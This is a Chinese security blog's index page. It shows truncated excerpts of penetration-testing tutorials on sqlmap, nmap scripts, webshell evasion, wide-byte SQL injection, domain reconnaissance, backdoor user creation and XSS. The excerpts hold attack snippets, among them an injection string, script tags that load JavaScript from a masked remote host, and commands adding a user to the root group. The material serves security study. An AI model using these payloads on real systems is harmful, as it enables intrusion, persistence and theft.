摘要:
sqlmap 使用总结 0x01 需要了解 当给 sqlmap 这么一个 url 的时候,它会:1、判断可注入的参数 2、判断可以用那种 SQL 注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 sqlmap 支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件 阅读全文
摘要:
选择在kali中复现 选择了redis5.0.5版本 一.下载并安装: $ wget http://download.redis.io/releases/redis-5.0.5.tar.gz $ tar xzf redis-5.0.5.tar.gz $ cd redis-5.0.5 $ make $ 阅读全文
摘要:
nmap 进阶使用 [ 脚本篇 ] 2017-05-18 NMAP 0x01 前言 因为今天的重点并非nmap本身使用,这次主要还是想给大家介绍一些在实战中相对比较实用的nmap脚本,所以关于nmap自身的一些选项作用就不再多说了,详情可参考博客端口渗透相关文章,废话少说,我们直接开始,实际中我们可 阅读全文
摘要:
转载自https://klionsec.github.io/2017/10/11/bypasswaf-for-webshell/ 全方位构造免杀 webshell 小结[一] 前言: 本文几乎涵盖了市面上所有已知的webshell免杀手段,自己也很清楚,有些东西一旦公布出去,基本就活不太久了,但好在 阅读全文
摘要:
基础命令使用 [ win篇 ] 2017-11-05 WIN CMD 0x01 基础命令使用: 演示环境: 1 2 win2008R2cn ip: 192.168.3.23 假设为入侵者机器 win2012R2cn ip: 192.168.3.122 假设为目标机器 1 2 3 4 5 6 # wh 阅读全文
摘要:
首先前期是数据库的编码是gbk,,前提前提!!!!!!!!!!!!!! 当我们提交是"id=1' and 1=1#时,MySQL执行的语句是id='1\' and 1=1#' 很明显这是没有注入成功的,单引号并没有闭合, 但是当我们提交的是 id=1%df' and 1=1# MySQL执行的语句就 阅读全文
摘要:
首先查看当前机器的网络环境,收集域内的信息,包括所有的用户名和计算机以及相关关键组的信息。 net user /domain 查看域用户 net view /domain 查看几个域 net view domain:XXX 查看域内的主机 net group /domain 查看域内的组 net g 阅读全文
摘要:
mysql中的information_schema 结构用来存储数据库系统信息 information_schema 结构中这几个表存储的信息,在注射中可以用到的几个表。 | SCHEMATA ――>存储数据库名的, |——>关键字段:SCHEMA_NAME,表示数据库名称 | TABLES ――> 阅读全文
摘要:
新建用户的两种方式: 一步步创建 useradd -m user1 #-m 是建立家目录 passwd user1 #设置密码 usermod -a -G root user1 #加入管理员 chsh -s /bin/bash user1 #登 陆后使用bash 一句话建立用户 useradd -m 阅读全文
摘要:
(1)普通的XSS JavaScript注入<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://***/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号< 阅读全文